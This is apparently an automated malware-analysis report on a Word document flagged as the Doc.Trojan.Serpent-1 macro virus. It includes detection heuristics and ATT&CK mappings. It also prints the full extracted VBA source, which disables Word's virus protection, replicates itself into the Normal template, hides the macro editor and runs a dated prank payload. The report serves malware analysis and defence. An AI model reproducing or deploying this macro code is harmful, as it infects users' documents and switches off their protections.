MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The macro attempts to disable virus protection and manipulates the document's code. The ClamAV detection 'Doc.Trojan.Serpent-1' strongly suggests malicious intent, likely involving the execution of a payload.
Heuristics 3
-
ClamAV: Doc.Trojan.Serpent-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Serpent-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2366 bytes |
SHA-256: d7fea8f1fe039eb2c70a704a59473ad9740e901233b830c55754a0463458dd79 |
|||
|
Detection
ClamAV:
Doc.Trojan.Serpent-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Modul1"
Private Sub Document_Open(): Dim KIOXCFG, SDFHITD, GHJIDFR, LKJWERT: Set LKJWERT = ActiveDocument.VBProject.VBComponents(1).CodeModule: Const nula = 2 * 0
With Options: .VirusProtection = nula: End With
Set KIOXCFG = ThisDocument.VBProject.VBComponents(1).CodeModule
Set SDFHITD = NormalTemplate.VBProject.VBComponents(1).CodeModule
GHJIDFR = KIOXCFG.lines(1, KIOXCFG.countoflines)
If SDFHITD.countoflines = KIOXCFG.countoflines Then
MsgBox "Error245! MSWord will try to fix the problem.", vbCritical, "MSWord - error"
End If
Dim QOINMV As New DataObject: QOINMV.SetText GHJIDFR
With SDFHITD: .deletelines 1, SDFHITD.countoflines: .insertlines 1, QOINMV.GetText
End With: With LKJWERT: .deletelines 1, LKJWERT.countoflines: .insertlines 1, QOINMV.GetText
End With
If Day(Now()) = 7 Then
Dim asd As String
For l = 1 To 4
asd = Chr(Rnd * 34 + 123) & ChrW(Rnd * 100 + 23)
asd = asd & Chr(Rnd * 200 - 10): dsa = asd & Hex(234 * Rnd) & Chr(Rnd * 5 + 55)
dfg = dsa & Hex(54) & asd & dsa: h = Asc(Chr(Rnd * 123)): x = asd & dfg & dsa & h & x
Next l
MsgBox x & dsa & asd & dfg & dsa & dfg & dfg & dsa & "---> Kad sve izgleda da umire ono se ustvari radja! <---" & dsa & dfg & asd & dfg & dfg & h & asd & dfg & x, vbExclamation, asd & " BIHnet.ORG 4nD EB Vir Labs 43v3r!!! " & asd
Application.WindowState = wdWindowStateNormal
'===={ ideja za D-Cross payload: e[ax] }===
Application.Move 150, 150
Application.Caption = "...hmmm, strange!"
For c = 1 To 300
Application.Move c, c
Application.Move -c, -c
Next c
'===={ kraj kôda za D-Cross payload }======
End If
With CommandBars: .Item("Macro").Controls("Visual Basic Editor").Enabled = False: End With: ActiveDocument.Save
'W97M.sErPeNt bY e[ax]
'D-Cross payload bY e[ax]
'Greetz: k04x, rudeboy, t[r]ax, E-Man, BIGFOOOT, SnakeLord
'Vr4g, h4dija, slash ...te ostalim pri BIHnet.org
'10x to: [moebius], KnowDeth, Jackie 2Fl0wer, Psyclone X, Mist
'mort-, Nala, LifeWire, GygaByte, ^Coke, Fulvian, VirusBuster
'...and to VicodinES (Once again God Bless tha Poppy!)
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.